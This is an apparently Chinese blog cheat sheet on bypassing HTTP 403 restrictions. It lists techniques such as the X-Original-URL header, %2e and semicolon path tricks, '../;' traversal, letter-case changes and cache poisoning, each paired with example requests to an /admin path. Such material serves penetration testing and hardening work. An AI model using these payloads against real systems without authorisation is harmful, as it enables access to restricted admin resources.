-
🌐 使用 "X-Original-URL" 头:
-
原理 :某些服务器在处理请求时,会检查
X-Original-URL头部来确定请求的原始 URL。这种方法利用了服务器对X-Original-URL头部的信任,将其值设置为受限制的路径,从而绕过访问控制。 -
原始请求:
httpGET /admin HTTP/1.1 Host: target.com -
绕过请求:
httpGET /anything HTTP/1.1 Host: target.com X-Original-URL: /admin
-
-
✨ 在第一个斜杠后添加
%2e:-
原理 :
%2e是 URL 编码表示的点 (.),某些服务器可能会错误地解析它,导致忽略路径的一部分,从而访问受限制的资源。 -
原始请求:
httphttp://target.com/admin => 403 -
绕过请求:
httphttp://target.com/%2e/admin => 200
-
-
🛠 尝试在 URL 中添加点 (.) 斜杠 (/) 和分号 (;):
-
原理:一些服务器在处理路径时,可能会忽略或错误处理特殊字符,如点 (.)、斜杠 (/) 和分号 (;),从而允许访问受限制的资源。
-
原始请求:
httphttp://target.com/admin => 403 -
绕过请求:
httphttp://target.com/secret/. => 200 http://target.com/secret//. => 200 http://target.com/./secret/.. => 200 http://target.com/;/secret => 200 http://target.com/;//secret => 200
-
-
🗂 在目录名称后添加
../;:-
原理 :目录遍历攻击的一种变体,通过在路径中添加
../;,可能会绕过服务器的访问控制检查,直接访问受限制的资源。 -
原始请求:
httphttp://target.com/admin -
绕过请求:
httphttp://target.com/admin../;
-
-
🔠 尝试将 URL 中的字母大写:
-
原理:某些服务器对路径区分大小写,通过更改路径中某些字母的大小写,可能会绕过访问控制检查。
-
原始请求:
httphttp://target.com/admin -
绕过请求:
httphttp://target.com/aDmIN
-
-
📦 通过 Web 缓存中毒:
-
原理:利用 Web 缓存服务器对请求头的信任,将受限制路径的值存入缓存中,从而在后续请求中绕过访问控制。
-
绕过请求:
httpGET /anything HTTP/1.1 Host: victim.com X-Original-URL: /admin
-
🚀 403 页面绕过技巧
FreeCultureBoy2024-08-07 22:01
相关推荐
Figo_Cheung21 分钟前
Figo义商本体约束推理引擎 (CRE):基于已部署CRE本地模型的技术实践研究——迈向AGI时代的AI伦理安全框架信创DevOps先锋1 小时前
DevOps工具链选型新趋势:本土化适配与安全可控成企业核心诉求ayt0071 小时前
Netty AbstractNioChannel源码深度剖析:NIO Channel的抽象实现盟接之桥4 小时前
盟接之桥®制造业EDI软件,打通全球供应链“最后一公里”,赋能中国制造连接世界ZKNOW甄知科技4 小时前
数智同行:甄知科技2026年Q1季度回顾m0_738120724 小时前
网络安全编程——Python编写基于UDP的主机发现工具(解码IP header)上海云盾商务经理杨杨4 小时前
WAF绕过技巧与防护加固:攻防实战,彻底封堵Web安全漏洞oi..4 小时前
《Web 安全入门|XSS 漏洞原理、CSP 策略与 HttpOnly 防护实践》Nova_AI4 小时前
009、AI安全与可信:合规、治理与新兴市场一名优秀的码农4 小时前
vulhub系列-62-dcoffeaddicts(超详细)